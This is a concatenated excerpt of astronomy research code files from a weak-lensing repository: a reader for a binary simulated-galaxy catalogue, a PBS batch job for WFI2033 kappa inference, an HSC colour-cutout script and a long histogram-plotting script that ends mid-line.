1\nfilter_number_for_c_johnson_V = 2\nfilter_number_for_c_johnson_rc = 3\nfilter_number_for_c_johnson_ic = 4\nfilter_number_for_vista_johnson_Z = 5\nfilter_number_for_vista_johnson_Y = 6\nfilter_number_for_vista_johnson_J = 7\nfilter_number_for_vista_johnson_H = 8\nfilter_number_for_c_johnson_K = 9\nfilter_number_for_vista_johnson_ks = 10\nfilter_number_for_i1_band = 11\nfilter_number_for_i2_band = 12\nfilter_number_for_i3_band = 13\nfilter_number_for_i4_band = 14\nfilter_number_for_u_band_trans = 15\nfilter_number_for_g_band_trans = 16\nfilter_number_for_r_band_trans = 17\nfilter_number_for_i_band_trans = 18\nfilter_number_for_z_band_trans = 19\nfilter_number_for_ACS_WFC_F435W = 20\nfilter_number_for_ACS_WFC_F475W = 21\nfilter_number_for_ACS_WFC_F606W = 22\nfilter_number_for_ACS_WFC_F625W = 23\nfilter_number_for_ACS_WFC_F775W = 24\nfilter_number_for_ACS_WFC_F814W = 25\nfilter_number_for_ACS_WFC_F850_LP = 26\nfilter_number_for_GALEX_FUV = 27\nfilter_number_for_GALEX_NUV = 28\nfilter_number_for_NIC_F110W = 29\nfilter_number_for_NIC_F160W3 = 30\nfilter_number_for_VIMOS_U = 31\nfilter_number_for_WFC3_IR_F105W = 32\nfilter_number_for_WFC3_IR_F125W = 33\nfilter_number_for_WFC3_IR_F160W = 34\nfilter_number_for_WFC3_UVIS_F225W = 35\nfilter_number_for_WFC3_UVIS_F275W = 36\nfilter_number_for_WFC3_UVIS_F336W = 37\nfilter_number_for_WFPC2_F300W = 38\nfilter_number_for_WFPC2_F450W = 39\n\n\n#data_main_dir = '/afs/mpa/temp/hilbert1/Millennium/lensing/maps/GGL_maps/'\ndata_main_dir = '/lfs08/rusucs/0408/'\n\nsource_plane_number = 30\nimage_plane_number = 60\nn_pix = 4096\n\nfield_number_0, field_number_1 = 0,0\ndata_file_name_prefix = 'GGL_los_8_' + str(field_number_0) + '_' + str(field_number_1) + '_N_' + str(n_pix) + '_ang_4_'\n\nimage_plane_number = 60\n\nimage_plane_file_name = data_main_dir + data_file_name_prefix + 'Henriques2014_galaxies_on_plane_' + str(image_plane_number) + '_f.images'\n\nprint(image_plane_file_name)\n\nwith open(image_plane_file_name, mode = 'rb') as file: # b is important -> binary\n\n lower_bound = np.fromfile(file, 'f8', 2)\n # print(lower_bound)\n\n upper_bound = np.fromfile(file, 'f8', 2)\n # print(upper_bound)\n\n plane_angle, = np.fromfile(file, 'f8', 1)\n # print(plane_angle)\n\n redshift, = np.fromfile(file, 'f8', 1)\n # print(redshift)\n\n n_galaxies, = np.fromfile(file, 'i8', 1)\n # print(n_galaxies)\n\n n_cells = np.fromfile(file, 'i4', 2)\n # print(n_cells)\n\n galaxy = np.fromfile(file, galaxy_struct, n_galaxies)\n print(galaxy[0]['mag_dust'][filter_number_for_i_band_trans])\n #print(galaxy['mag_dust'][:,filter_number_for_i_band_trans]) # this is how to correctly read a column\n\n# below is what I would do to read from a specific location without saving the preceeding locations\n# galaxy = np.fromfile(file, galaxy_struct, 100)\n# print(galaxy[0]['mag_dust'][filter_number_for_i_band_trans])\n\n# galaxy = np.fromfile(file, galaxy_struct, -1)\n# print(galaxy[100]['mag_dust'][filter_number_for_i_band_trans])\n\nprint(n_galaxies)\n" }, { "alpha_fraction": 0.6779963970184326, "alphanum_fraction": 0.7728086113929749, "avg_line_length": 26.950000762939453, "blob_id": "f6ac767a4d37ae939745f0e4e023db61c87abc17", "content_id": "d64a1e53b2790796dc7b580eae3a5635a318a6b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 559, "license_type": "no_license", "max_line_length": 80, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim19.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log19s.out\n#PBS -e Log19s.err\n#PBS -N 19s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal gamma oneoverr SIShalo\npython inferkappasimbias.py WFI2033 5 120 23 meds gal gamma oneoverr SIShalo\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal gamma oneoverr SIShalo\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal gamma oneoverr SIShalo\n" }, { "alpha_fraction": 0.5092611908912659, "alphanum_fraction": 0.5386056303977966, "avg_line_length": 35.67938995361328, "blob_id": "f7bebef6d49e2dc5bd78ac72ec84d248b8d73dec", "content_id": "dfced32e1393482da231de30068d8b12bed195a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4805, "license_type": "no_license", "max_line_length": 253, "num_lines": 131, "path": "/python/image_utilities/HSCcolorcutouts.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given a folder with .fits RGB images and the input list for DAS Cutout, it produces a color-combined RGB using Humvi (https://github.com/drphilmarshall/HumVI/blob/master/examples/Examples.ipynb )\n# run as python HSCcolorcutouts.py /Volumes/LaCieSubaru/Gaia/cutout0/ /Volumes/LaCieSubaru/Gaia/DelchambreHSC5arcsecunique_cutout0.cat\n\n#from astropy.io import fits\nimport numpy as np\nimport os\nimport sys\nimport glob\nimport humvi\nfrom IPython.display import Image\nfrom astropy.io import fits\n\nimgpath = str(sys.argv[1])\ncat = str(sys.argv[2])\nos.chdir(imgpath)\nfiles = glob.glob('*.fits')\n\n'''\n The input DAS Cutout catalogue is designed to ask for grizy for each object, in case some of the objects are missing some of the gri frames. The first part of the name of the output images produced by DAS Cutout is the line number in the input list.\n'''\n\nlist = np.zeros(len(files))\nfor i in range(len(files)):\n list[i] = int(files[i].split('-')[0])\nlist=np.sort(list)\n\nimcat = np.genfromtxt(cat,usecols=[1,2,3,4],unpack=True,dtype='string')\nimgnr = len(imcat[0]) + 1 # image ID starts at 2\n\npos_g = 2\npos_r = 3\npos_i = 4\npos_z = 5\npos_y = 6\nwhile pos_y <= imgnr:\n print pos_y,'/',imgnr\n pos = [pos_g,pos_r,pos_i,pos_z,pos_y]\n #print pos\n inside = np.in1d(pos, list)\n color = ''\n colorcount = 0\n if inside[0] == True:\n color += 'g'\n if colorcount < 3: colorcount += 1\n if inside[1] == True:\n color += 'r'\n if colorcount < 3: colorcount += 1\n if inside[2] == True:\n color += 'i'\n if colorcount < 3: colorcount += 1\n if inside[3] == True:\n if colorcount < 3:\n color += 'z'\n colorcount += 1\n if inside[4] == True:\n if colorcount < 3:\n color += 'y'\n colorcount += 1\n out = imgpath + imcat[1][pos_g - 2].replace(':','') + imcat[2][pos_g - 2].replace(':','') + '_' + imcat[3][pos_g - 2] + '_' + color + '.png'\n if colorcount == 1:\n bfile = ''\n gfile = ''\n rfile = ''\n here = False\n i = 0\n while here == False:\n if int(files[i].split('-')[0]) in pos:\n bfile, gfile, rfile, outfile = files[i], files[i], files[i], out\n scales, offset, Q, alpha, masklevel, saturation = (1.0,1.0,1.0), 0.5, 1.0, 0.1, -1.0, 'white'\n humvi.compose(rfile, gfile, bfile, scales=scales, Q=Q, alpha=alpha, masklevel=masklevel, saturation=saturation, offset=offset, backsub=False, vb=True, outfile=outfile)\n Image(filename=outfile,width=400)\n here = True\n i += 1\n if colorcount == 2:\n bfile = ''\n gfile = ''\n rfile = ''\n here1 = False\n here2 = False\n i = 0\n while here1 == False or here2 == False:\n if int(files[i].split('-')[0]) in pos:\n if here1 == False:\n bfile = files[i]\n here1 = True\n else:\n here2 = True\n rfile = files[i]\n i += 1\n im1 = fits.open(bfile)\n im2 = fits.open(rfile)\n data = im1[1].data\n data = (im1[1].data + im2[1].data)/2.0\n im1.writeto('tmp.fits',clobber=True)\n gfile, outfile = 'tmp.fits', out\n scales, offset, Q, alpha, masklevel, saturation = (1.0,1.0,1.0), 0.0, 2.0, 0.1, -1.0, 'white'\n humvi.compose(rfile, gfile, bfile, scales=scales, Q=Q, alpha=alpha, masklevel=masklevel, saturation=saturation, offset=offset, backsub=False, vb=True, outfile=outfile)\n Image(filename=outfile,width=400)\n if colorcount == 3:\n bfile = ''\n gfile = ''\n rfile = ''\n here1 = False\n here2 = False\n here3 = False\n i = 0\n while here1 == False or here2 == False or here3 == False:\n if int(files[i].split('-')[0]) in pos:\n if here1 == False:\n bfile = files[i]\n here1 = True\n else:\n if here1 == True and here2 == False:\n here2 = True\n gfile = files[i]\n else:\n if here1 == True and here2 == True:\n here3 = True\n rfile = files[i]\n i += 1\n outfile = out\n scales, offset, Q, alpha, masklevel, saturation = (1.0,1.0,1.0), 0.0, 2.0, 0.1, -1.0, 'white'\n humvi.compose(rfile, gfile, bfile, scales=scales, Q=Q, alpha=alpha, masklevel=masklevel, saturation=saturation, offset=offset, backsub=False, vb=True, outfile=outfile)\n Image(filename=outfile,width=400)\n pos_g += 5\n pos_r += 5\n pos_i += 5\n pos_z += 5\n pos_y += 5\n print colorcount, out\nos.system(\"rm -f tmp.fits\")\n" }, { "alpha_fraction": 0.5746601819992065, "alphanum_fraction": 0.667991578578949, "avg_line_length": 59.71201705932617, "blob_id": "388c43a1b752bc338071c1f0ba2a23a399df9dc0", "content_id": "8cec3cda421d95f67363da3a731615563cf8f3e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 61137, "license_type": "no_license", "max_line_length": 278, "num_lines": 1007, "path": "/python/weightinghistogramsuniversalW4combineoldnew.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# fields CFHTLenS W1-4\n# subfields: 171 1deg^2 throughout W1-4\n# cells: 4x4arcmin covering each subfield, in a grid\n# usage: use one of the following arguments: lens name, followed by orig or samp, followed by number of bins, followed by radius (45,60,90 or 120) and by maglimit\n\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n#import scipy\n#from scipy import special\n#from astropy.io import fits\n#from astropy.wcs import WCS\n#from astropy import units as u\n#from astropy.coordinates import SkyCoord\n#from astropy.io import ascii\n#from astropy.table import Table, Column\nimport time\nimport matplotlib.pyplot as plt\n#from numpy.random import normal\nfrom scipy.stats.kde import gaussian_kde\nfrom numpy import linspace\n\nprint(\"Arguments: \\n Lens field: %s \\n Original values or samples drawn from P(z) and P(Mstar): %s \\n Number of bins: %s \\n Radius of each cell: %s \\n Limiting i-band magnitude: %s \\n\" % (str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), str(sys.argv[4]), str(sys.argv[5])))\n\nif (str(sys.argv[2]) == \"samp\") or (str(sys.argv[2]) == \"tab\"):\n print \"This process is both processor and memory intensive and will take a couple of hours for a sampling of 1000...\"\n start_time = time.time()\n\nwith open('fieldsforhist50try_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist75try_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist50try_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist75try_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\ncols=1\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nplt.suptitle(r'HE0435 weight histogram test W1-W4', fontsize=10, y=0.998)\n\n\ngauss_q_W4_50old = gaussian_kde(q_W4_50old)\n\ngauss_q_W4_75old = gaussian_kde(q_W4_75old)\n\ngauss_q_W4_50new = gaussian_kde(q_W4_50new)\n\ngauss_q_W4_75new = gaussian_kde(q_W4_75new)\n\nx = linspace(0,2,500)\n\nplt.subplot(451)\nrangemax=4\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\n#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(451)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75old[np.argmax(n_q_W4_75old)],np.average(q_W4_75old),np.median(q_W4_75old))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50new[np.argmax(n_q_W4_50new)],np.average(q_W4_50new),np.median(q_W4_50new))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{gal}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 1\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50new.size)/q_W4_50readnew.size, float(q_W4_75new.size)/q_W4_75readnew.size)\n\ncols=3\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nx = linspace(0,2,500)\n\n\ngauss_q_W4_50old = gaussian_kde(q_W4_50old)\n\ngauss_q_W4_75old = gaussian_kde(q_W4_75old)\n\ngauss_q_W4_50new = gaussian_kde(q_W4_50new)\n\ngauss_q_W4_75new = gaussian_kde(q_W4_75new)\n\nplt.subplot(452)\nrangemax=4\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='k', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='k', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='k', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='k', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(452)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75old[np.argmax(n_q_W4_75old)],np.average(q_W4_75old),np.median(q_W4_75old))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50new[np.argmax(n_q_W4_50new)],np.average(q_W4_50new),np.median(q_W4_50new))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{1}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 2\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\ncols=5\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nplt.subplot(453)\nrangemax=4\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nax=plt.subplot(453)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75new[np.argmax(n_q_W4_75new)],np.average(q_W4_75new),np.median(q_W4_75new))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_{z}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 3\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W4_50old.size)/q_W4_50readold.size, float(q_W4_75old.size)/q_W4_75readold.size)\n\ncols=7\n\nq_W4_50readnew = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50new = q_W4_50readnew[q_W4_50readnew < 10]\n\nq_W4_75readnew = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_new.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75new = q_W4_75readnew[q_W4_75readnew < 10]\n\nq_W4_50readold = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50old = q_W4_50readold[q_W4_50readold < 10]\n\nq_W4_75readold = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s_old.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75old = q_W4_75readold[q_W4_75readold < 10]\n\nplt.subplot(454)\nrangemax=4\n\nn_q_W4_50old, bins_q_W4_50old, patches = plt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_50new, bins_q_W4_50new, patches = plt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nn_q_W4_75old, bins_q_W4_75old, patches = plt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nn_q_W4_75new, bins_q_W4_75new, patches = plt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_50old, histtype='step', color='k', label='W4_50old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_50new, histtype='step', color='r', label='W4_50new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\n\nplt.hist(q_W4_75old, histtype='step', color='k', label='W4_75old', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nplt.hist(q_W4_75new, histtype='step', color='r', label='W4_75new', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n\nax=plt.subplot(454)\n\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50old[np.argmax(n_q_W4_50old)],np.average(q_W4_50old),np.median(q_W4_50old))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n\ns = \"50: %.3f,%.3f,%.3f\" % 